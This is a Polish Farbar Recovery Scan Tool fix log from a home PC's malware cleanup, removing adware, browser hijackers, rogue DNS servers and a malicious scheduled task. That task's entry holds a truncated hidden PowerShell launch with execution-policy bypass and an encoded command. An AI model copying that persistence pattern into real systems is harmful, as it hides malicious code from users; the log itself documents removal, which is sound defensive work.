Rezultat naprawy Farbar Recovery Scan Tool (x64) Wersja:18-04-2016 Uruchomiony przez OEM (2016-04-26 19:01:38) Run:1 Uruchomiony z C:\Users\OEM\Downloads ZaÅ‚adowane profile: OEM (DostÄ™pne profile: OEM) Tryb startu: Normal ============================================== fixlist - zawartość: ***************** CloseProcesses: S2 DeskTop_F; C:\ProgramData\desktopfind\desktop244.exe [236728 2016-03-16] (DeskTopService) R2 jIxmRfR_protect; C:\ProgramData\jIxmRfR\protect\protect.exe [303016 2016-04-21] () S2 jIxmRfR_update; C:\Program Files (x86)\jIxmRfR\jIxmRfR\bin\jIxmRfR_server.exe [473000 2016-04-21] () Task: {2D111878-3D8C-419B-ADDE-2C07AD40D75B} - System32\Tasks\jIxmRfRBrowserUpdateCore => C:\Program Files (x86)\jIxmRfR\jIxmRfR\bin\jIxmRfR_server.exe [2016-04-21] () Task: {2D3FB577-46E9-4516-9F40-65F56CC11E63} - System32\Tasks\Browser Updater Task(Core) => C:\Program Files (x86)\QQBrowser\Update\CE27B5CEDB198923421F52D8D274356E\Update\BrowserUpdate.exe [2016-04-08] (Tencent) <==== UWAGA Task: {2E125864-79D1-4527-ABE8-403129516330} - System32\Tasks\{163E9032-7509-4DB5-9B49-2C9F925F1F05} => pcalua.exe -a C:\Users\OEM\Downloads\chromeinstall-7u67.exe -d C:\Users\OEM\Downloads Task: {329BC00C-CC95-40D7-ABB0-AA6DDBFEA258} - System32\Tasks\{B09836DB-37DC-4E1A-8ADC-0823D06892C0} => C:\Program Files (x86)\Camy II v2.3\Camy2.exe Task: {4510E2CF-C195-4129-91E3-2BA3136E3D30} - System32\Tasks\{50319244-F92C-4AF6-BADA-4AF495E42C1C} => C:\Program Files (x86)\Camy II v2.3\Camy2.exe Task: {51850AE3-AD21-433A-BE99-DDAE9893375F} - System32\Tasks\{0C0B7A47-7A0B-0E7F-7E11-0D7A0508110D} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (dane wartoÅ›ci zawierajÄ… 9448 znaków wiÄ™cej). <==== UWAGA Task: {7D5718D0-2CF9-43F4-83AC-8272570ABDCB} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater – Install HPSA Logon Task => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe Task: {7D9F93C0-67D4-4D00-A2CF-0AB69B7B7076} - System32\Tasks\{2E97FE42-6004-45C2-BEFB-A603AE56EA6B} => C:\Program Files (x86)\Camy II v2.3\Camy2.exe Task: {8DC7FCD3-28D4-4244-B2C0-C74C781B447A} - System32\Tasks\jIxmRfRBrowserUpdateUA => C:\Program Files (x86)\jIxmRfR\jIxmRfR\bin\jIxmRfR_server.exe [2016-04-21] () Task: {A447D529-E569-4BD9-8483-4ECA5FCA3A52} - System32\Tasks\WinTaske => C:\Program Files (x86)\WinTaske\WinTaske\WinTaske.exe [2016-02-03] () <==== UWAGA Task: {B72FD7B7-0FE1-45BE-ADD5-DBE410A14A33} - System32\Tasks\jIxmRfRCheckTask => C:\Program Files (x86)\jIxmRfR\jIxmRfR\bin\jIxmRfR_server.exe [2016-04-21] () Task: {F95473AA-C127-4614-8397-FC0CFA50B19C} - System32\Tasks\{9A821CF0-9181-49A8-B0EC-2ABE2EBE8768} => C:\Program Files (x86)\Camy II v2.3\Camy2.exe HKLM-x32\...\Run: [] => [X] HKU\S-1-5-21-1141579635-3649818015-3828442440-1000\...\Run: [GoogleChromeAutoLaunch_344DDB7B60937B1E369F7AD19F7CD062] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [874648 2016-04-06] (Google Inc.) HKU\S-1-5-21-1141579635-3649818015-3828442440-1000\...\Run: [793893109BBBD53AF57A2AEA9CEEF7B06516C20F._service_run] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [874648 2016-04-06] (Google Inc.) ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.piesearch.com/?uid=80fdcc12-18c0-4026-af5f-eb5f0a08f5cd ShortcutWithArgument: C:\Users\OEM\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.piesearch.com/?uid=80fdcc12-18c0-4026-af5f-eb5f0a08f5cd ShortcutWithArgument: C:\Users\Public\Desktop\Avast SafeZone Browser.lnk -> C:\Program Files\AVAST Software\SZBrowser\launcher.exe (Avast Software) -> hxxp://www.piesearch.com/?uid=80fdcc12-18c0-4026-af5f-eb5f0a08f5cd ShortcutWithArgument: C:\Users\Public\Desktop\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.piesearch.com/?uid=80fdcc12-18c0-4026-af5f-eb5f0a08f5cd HKU\S-1-5-21-1141579635-3649818015-3828442440-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://search.us.com/?guid={B498C0B8-DB67-494B-A93F-6983C5C64445} HKU\S-1-5-21-1141579635-3649818015-3828442440-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://search.us.com/?guid={B498C0B8-DB67-494B-A93F-6983C5C64445} SearchScopes: HKU\S-1-5-21-1141579635-3649818015-3828442440-1000 -> {6C0B584D-6935-4C23-84CA-9371887E42F5} URL = hxxp://search.yahoo.com/search?p={searchTerms}&fr=tightropetb&type=11433 SearchScopes: HKU\S-1-5-21-1141579635-3649818015-3828442440-1000 -> {D8DEF47E-1B7D-48B0-986F-3FEE2334582A} URL = hxxp://search.us.com/serp?guid={B498C0B8-DB67-494B-A93F-6983C5C64445}&k={searchTerms} StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe hxxp://www.piesearch.com/?uid=80fdcc12-18c0-4026-af5f-eb5f0a08f5cd StartMenuInternet: FIREFOX.EXE - C:\Program Files (x86)\Mozilla Firefox\firefox.exe hxxp://www.piesearch.com/?uid=80fdcc12-18c0-4026-af5f-eb5f0a08f5cd StartMenuInternet: Google Chrome - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe hxxp://www.piesearch.com/?uid=80fdcc12-18c0-4026-af5f-eb5f0a08f5cd CHR HKLM-x32\...\Chrome\Extension: [dkmjljdbbgogihjcapfhgkonfmccbffp] - hxxps://clients2.google.com/service/update2/crx FF HKLM-x32\...\Firefox\Extensions: [sp@avast.com] - C:\Program Files\AVAST Software\Avast\SafePrice\FF Tcpip\Parameters: [NameServer] 82.163.142.7 95.211.158.134 Tcpip\..\Interfaces\{9506D651-7D0D-4122-8524-9FD5F47614CD}: [NameServer] 82.163.142.7 95.211.158.134 Tcpip\..\Interfaces\{ADF0E688-D307-4D46-9A33-584F845183CD}: [NameServer] 82.163.142.7 95.211.158.134 Tcpip\..\Interfaces\{DC85143D-8AE0-4F46-9CC2-2DC2B61D52D0}: [NameServer] 82.163.142.7 95.211.158.134 DeleteKey: HKCU\Software\1Q1F1S1C1P1E1C1F1N1C1T1H2UtF1E1I DeleteKey: HKCU\Software\dobreprogramy DeleteKey: HKCU\Software\Classes\jIxmRfRHTM DeleteKey: HKCU\Software\Clients\StartMenuInternet\jIxmRfRHTM DeleteKey: HKLM\SOFTWARE\Clients\StartMenuInternet\Opera DeleteKey: HKLM\SOFTWARE\Wow6432Node\jIxmRfR DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla\Thunderbird Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\ApplicationAssociationToasts /v jIxmRfRHTM_.html /f Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\ApplicationAssociationToasts /v jIxmRfRHTM_.xht /f Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\ApplicationAssociationToasts /v jIxmRfRHTM_https /f Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\ApplicationAssociationToasts /v jIxmRfRHTM_http /f Reg: reg delete HKCU\Software\RegisteredApplications /v jIxmRfRHTM /f Reg: reg delete "HKCU\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store" /v "C:\Program Files (x86)\jIxmRfR\jIxmRfR\chrome.exe" /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store" /v "C:\Program Files (x86)\jIxmRfR\jIxmRfR\bin\jIxmRfR_server.exe" /f C:\Program Files (x86)\jIxmRfR C:\Program Files (x86)\QQBrowser C:\Program Files (x86)\SearchesToYesbnd C:\Program Files (x86)\WinTaske C:\Program Files (x86)\WinZipper C:\Program Files (x86)\mozilla firefox\plugins C:\ProgramData\desktopfind C:\ProgramData\jIxmRfR C:\ProgramData\XwinpX C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TopWare Interactive C:\Users\OEM\AppData\Local\jIxmRfR C:\Users\OEM\AppData\Roaming\Drimar C:\Users\OEM\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\DAEMON Tools Lite.lnk C:\Users\OEM\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\Users\OEM\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\OEM\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome (2).lnk C:\Users\OEM\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk C:\Users\OEM\Desktop\Pressure.lnk C:\Users\Public\Desktop\Google Chrome.lnk C:\Windows\system32\log C:\Windows\SysWOW64\pl.html CMD: ipconfig /flushdns CMD: netsh advfirewall reset EmptyTemp: ***************** Procesy zostaÅ‚y pomyÅ›lnie zamkniÄ™te. DeskTop_F => serwis pomyÅ›lnie usuniÄ™to jIxmRfR_protect => serwis pomyÅ›lnie usuniÄ™to jIxmRfR_update => serwis pomyÅ›lnie usuniÄ™to HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2D111878-3D8C-419B-ADDE-2C07AD40D75B} => klucz nie znaleziono. C:\Windows\System32\Tasks\jIxmRfRBrowserUpdateCore => pomyÅ›lnie przeniesiono "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\jIxmRfRBrowserUpdateCore" => klucz pomyÅ›lnie usuniÄ™to "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2D3FB577-46E9-4516-9F40-65F56CC11E63}" => klucz pomyÅ›lnie usuniÄ™to "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2D3FB577-46E9-4516-9F40-65F56CC11E63}" => klucz pomyÅ›lnie usuniÄ™to C:\Windows\System32\Tasks\Browser Updater Task(Core) => pomyÅ›lnie przeniesiono "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Browser Updater Task(Core)" => klucz pomyÅ›lnie usuniÄ™to "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2E125864-79D1-4527-ABE8-403129516330}" => klucz pomyÅ›lnie usuniÄ™to "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2E125864-79D1-4527-ABE8-403129516330}" => klucz pomyÅ›lnie usuniÄ™to C:\Windows\System32\Tasks\{163E9032-7509-4DB5-9B49-2C9F925F1F05} => pomyÅ›lnie przeniesiono "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{163E9032-7509-4DB5-9B49-2C9F925F1F05}" => klucz pomyÅ›lnie usuniÄ™to "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{329BC00C-CC95-40D7-ABB0-AA6DDBFEA258}" => klucz pomyÅ›lnie usuniÄ™to "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{329BC00C-CC95-40D7-ABB0-AA6DDBFEA258}" => klucz pomyÅ›lnie usuniÄ™to C:\Windows\System32\Tasks\{B09836DB-37DC-4E1A-8ADC-0823D06892C0} => pomyÅ›lnie przeniesiono "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{B09836DB-37DC-4E1A-8ADC-0823D06892C0}" => klucz pomyÅ›lnie usuniÄ™to "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{4510E2CF-C195-4129-91E3-2BA3136E3D30}" => klucz pomyÅ›lnie usuniÄ™to "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4510E2CF-C195-4129-91E3-2BA3136E3D30}" => klucz pomyÅ›lnie usuniÄ™to C:\Windows\System32\Tasks\{50319244-F92C-4AF6-BADA-4AF495E42C1C} => pomyÅ›lnie przeniesiono "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{50319244-F92C-4AF6-BADA-4AF495E42C1C}" => klucz pomyÅ›lnie usuniÄ™to "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{51850AE3-AD21-433A-BE99-DDAE9893375F}" => klucz pomyÅ›lnie usuniÄ™to "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{51850AE3-AD21-433A-BE99-DDAE9893375F}" => klucz pomyÅ›lnie usuniÄ™to C:\Windows\System32\Tasks\{0C0B7A47-7A0B-0E7F-7E11-0D7A0508110D} => pomyÅ›lnie przeniesiono "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{0C0B7A47-7A0B-0E7F-7E11-0D7A0508110D}" => klucz pomyÅ›lnie usuniÄ™to "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{7D5718D0-2CF9-43F4-83AC-8272570ABDCB}" => klucz pomyÅ›lnie usuniÄ™to "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7D5718D0-2CF9-43F4-83AC-8272570ABDCB}" => klucz pomyÅ›lnie usuniÄ™to C:\Windows\System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater – Install HPSA Logon Task => pomyÅ›lnie przeniesiono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater – Install HPSA Logon Task => klucz nie znaleziono. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7D9F93C0-67D4-4D00-A2CF-0AB69B7B7076}" => klucz pomyÅ›lnie usuniÄ™to "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7D9F93C0-67D4-4D00-A2CF-0AB69B7B7076}" => klucz pomyÅ›lnie usuniÄ™to C:\Windows\System32\Tasks\{2E97FE42-6004-45C2-BEFB-A603AE56EA6B} => pomyÅ›lnie przeniesiono "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{2E97FE42-6004-45C2-BEFB-A603AE56EA6B}" => klucz pomyÅ›lnie usuniÄ™to HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8DC7FCD3-28D4-4244-B2C0-C74C781B447A} => klucz nie znaleziono. C:\Windows\System32\Tasks\jIxmRfRBrowserUpdateUA => pomyÅ›lnie przeniesiono "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\jIxmRfRBrowserUpdateUA" => klucz pomyÅ›lnie usuniÄ™to "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A447D529-E569-4BD9-8483-4ECA5FCA3A52}" => klucz pomyÅ›lnie usuniÄ™to "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A447D529-E569-4BD9-8483-4ECA5FCA3A52}" => klucz pomyÅ›lnie usuniÄ™to C:\Windows\System32\Tasks\WinTaske => pomyÅ›lnie przeniesiono "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\WinTaske" => klucz pomyÅ›lnie usuniÄ™to HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B72FD7B7-0FE1-45BE-ADD5-DBE410A14A33} => klucz nie znaleziono. C:\Windows\System32\Tasks\jIxmRfRCheckTask => pomyÅ›lnie przeniesiono "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\jIxmRfRCheckTask" => klucz pomyÅ›lnie usuniÄ™to "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{F95473AA-C127-4614-8397-FC0CFA50B19C}" => klucz pomyÅ›lnie usuniÄ™to "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F95473AA-C127-4614-8397-FC0CFA50B19C}" => klucz pomyÅ›lnie usuniÄ™to C:\Windows\System32\Tasks\{9A821CF0-9181-49A8-B0EC-2ABE2EBE8768} => pomyÅ›lnie przeniesiono "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{9A821CF0-9181-49A8-B0EC-2ABE2EBE8768}" => klucz pomyÅ›lnie usuniÄ™to HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => Wartość pomyÅ›lnie usuniÄ™to HKU\S-1-5-21-1141579635-3649818015-3828442440-1000\Software\Microsoft\Windows\CurrentVersion\Run\\GoogleChromeAutoLaunch_344DDB7B60937B1E369F7AD19F7CD062 => Wartość pomyÅ›lnie usuniÄ™to HKU\S-1-5-21-1141579635-3649818015-3828442440-1000\Software\Microsoft\Windows\CurrentVersion\Run\\793893109BBBD53AF57A2AEA9CEEF7B06516C20F._service_run => Wartość pomyÅ›lnie usuniÄ™to C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk => Skrót - argument pomyÅ›lnie usuniÄ™to. C:\Users\OEM\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk => Skrót - argument pomyÅ›lnie usuniÄ™to. C:\Users\Public\Desktop\Avast SafeZone Browser.lnk => Skrót - argument pomyÅ›lnie usuniÄ™to. C:\Users\Public\Desktop\Mozilla Firefox.lnk => Skrót - argument pomyÅ›lnie usuniÄ™to. HKU\S-1-5-21-1141579635-3649818015-3828442440-1000\Software\Microsoft\Internet Explorer\Main\\Start Page => Wartość pomyÅ›lnie przywrócono HKU\S-1-5-21-1141579635-3649818015-3828442440-1000\Software\Microsoft\Internet Explorer\Main\\Default_Page_URL => Wartość pomyÅ›lnie przywrócono "HKU\S-1-5-21-1141579635-3649818015-3828442440-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6C0B584D-6935-4C23-84CA-9371887E42F5}" => klucz pomyÅ›lnie usuniÄ™to HKCR\CLSID\{6C0B584D-6935-4C23-84CA-9371887E42F5} => klucz nie znaleziono. "HKU\S-1-5-21-1141579635-3649818015-3828442440-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{D8DEF47E-1B7D-48B0-986F-3FEE2334582A}" => klucz pomyÅ›lnie usuniÄ™to HKCR\CLSID\{D8DEF47E-1B7D-48B0-986F-3FEE2334582A} => klucz nie znaleziono. HKLM\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command\\Default => Wartość pomyÅ›lnie przywrócono HKLM\SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\open\command\\Default => Wartość pomyÅ›lnie przywrócono HKLM\SOFTWARE\Clients\StartMenuInternet\Google Chrome\shell\open\command\\Default => Wartość pomyÅ›lnie przywrócono "HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\dkmjljdbbgogihjcapfhgkonfmccbffp" => klucz pomyÅ›lnie usuniÄ™to HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\sp@avast.com => Wartość pomyÅ›lnie usuniÄ™to HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\\NameServer => Wartość pomyÅ›lnie usuniÄ™to HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{9506D651-7D0D-4122-8524-9FD5F47614CD}\\NameServer => Wartość pomyÅ›lnie usuniÄ™to HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{ADF0E688-D307-4D46-9A33-584F845183CD}\\NameServer => Wartość pomyÅ›lnie usuniÄ™to HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{DC85143D-8AE0-4F46-9CC2-2DC2B61D52D0}\\NameServer => Wartość pomyÅ›lnie usuniÄ™to HKCU\Software\1Q1F1S1C1P1E1C1F1N1C1T1H2UtF1E1I => klucz pomyÅ›lnie usuniÄ™to HKCU\Software\dobreprogramy => klucz pomyÅ›lnie usuniÄ™to HKCU\Software\Classes\jIxmRfRHTM => niepowodzenie przy usuwaniu w pierwszym podejÅ›ciu (ErrorCode: C0000121), zobacz kolejnÄ… liniÄ™. HKCU\Software\Classes\jIxmRfRHTM => klucz pomyÅ›lnie usuniÄ™to HKCU\Software\Clients\StartMenuInternet\jIxmRfRHTM => klucz nie znaleziono. HKLM\SOFTWARE\Clients\StartMenuInternet\Opera => klucz nie znaleziono. HKLM\SOFTWARE\Wow6432Node\jIxmRfR => niepowodzenie przy usuwaniu w pierwszym podejÅ›ciu (ErrorCode: C0000121), zobacz kolejnÄ… liniÄ™. HKLM\SOFTWARE\Wow6432Node\jIxmRfR => klucz pomyÅ›lnie usuniÄ™to HKLM\SOFTWARE\Wow6432Node\Mozilla\Thunderbird => niepowodzenie przy usuwaniu w pierwszym podejÅ›ciu (ErrorCode: C0000121), zobacz kolejnÄ… liniÄ™. HKLM\SOFTWARE\Wow6432Node\Mozilla\Thunderbird => klucz pomyÅ›lnie usuniÄ™to ========= reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\ApplicationAssociationToasts /v jIxmRfRHTM_.html /f ========= Bť¤D: System nie znalazˆ w rejestrze okre˜lonego klucza albo warto˜ci. ========= Koniec Reg: ========= ========= reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\ApplicationAssociationToasts /v jIxmRfRHTM_.xht /f ========= Bť¤D: System nie znalazˆ w rejestrze okre˜lonego klucza albo warto˜ci. ========= Koniec Reg: ========= ========= reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\ApplicationAssociationToasts /v jIxmRfRHTM_https /f ========= Bť¤D: System nie znalazˆ w rejestrze okre˜lonego klucza albo warto˜ci. ========= Koniec Reg: ========= ========= reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\ApplicationAssociationToasts /v jIxmRfRHTM_http /f ========= Bť¤D: System nie znalazˆ w rejestrze okre˜lonego klucza albo warto˜ci. ========= Koniec Reg: ========= ========= reg delete HKCU\Software\RegisteredApplications /v jIxmRfRHTM /f ========= Bť¤D: System nie znalazˆ w rejestrze okre˜lonego klucza albo warto˜ci. ========= Koniec Reg: ========= ========= reg delete "HKCU\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store" /v "C:\Program Files (x86)\jIxmRfR\jIxmRfR\chrome.exe" /f ========= Bť¤D: System nie znalazˆ w rejestrze okre˜lonego klucza albo warto˜ci. ========= Koniec Reg: ========= ========= reg delete "HKU\S-1-5-18\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store" /v "C:\Program Files (x86)\jIxmRfR\jIxmRfR\bin\jIxmRfR_server.exe" /f ========= Bť¤D: System nie znalazˆ w rejestrze okre˜lonego klucza albo warto˜ci. ========= Koniec Reg: ========= C:\Program Files (x86)\jIxmRfR => pomyÅ›lnie przeniesiono C:\Program Files (x86)\QQBrowser => pomyÅ›lnie przeniesiono C:\Program Files (x86)\SearchesToYesbnd => pomyÅ›lnie przeniesiono C:\Program Files (x86)\WinTaske => pomyÅ›lnie przeniesiono C:\Program Files (x86)\WinZipper => pomyÅ›lnie przeniesiono C:\Program Files (x86)\mozilla firefox\plugins => pomyÅ›lnie przeniesiono C:\ProgramData\desktopfind => pomyÅ›lnie przeniesiono C:\ProgramData\jIxmRfR => pomyÅ›lnie przeniesiono C:\ProgramData\XwinpX => pomyÅ›lnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk => pomyÅ›lnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TopWare Interactive => pomyÅ›lnie przeniesiono C:\Users\OEM\AppData\Local\jIxmRfR => pomyÅ›lnie przeniesiono C:\Users\OEM\AppData\Roaming\Drimar => pomyÅ›lnie przeniesiono C:\Users\OEM\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\DAEMON Tools Lite.lnk => pomyÅ›lnie przeniesiono C:\Users\OEM\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk => pomyÅ›lnie przeniesiono C:\Users\OEM\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk => pomyÅ›lnie przeniesiono C:\Users\OEM\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome (2).lnk => pomyÅ›lnie przeniesiono C:\Users\OEM\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk => pomyÅ›lnie przeniesiono C:\Users\OEM\Desktop\Pressure.lnk => pomyÅ›lnie przeniesiono C:\Users\Public\Desktop\Google Chrome.lnk => pomyÅ›lnie przeniesiono C:\Windows\system32\log => pomyÅ›lnie przeniesiono C:\Windows\SysWOW64\pl.html => pomyÅ›lnie przeniesiono ========= ipconfig /flushdns ========= Konfiguracja IP systemu Windows Pomy˜lnie opr¢¾niono pami©† podr©czn¥ programu rozpoznawania nazw DNS. ========= Koniec CMD: ========= ========= netsh advfirewall reset ========= Ok. ========= Koniec CMD: ========= EmptyTemp: => 7.8 MB danych tymczasowych UsuniÄ™to. System wymagaÅ‚ restartu. ==== Koniec Fixlog 19:02:40 ====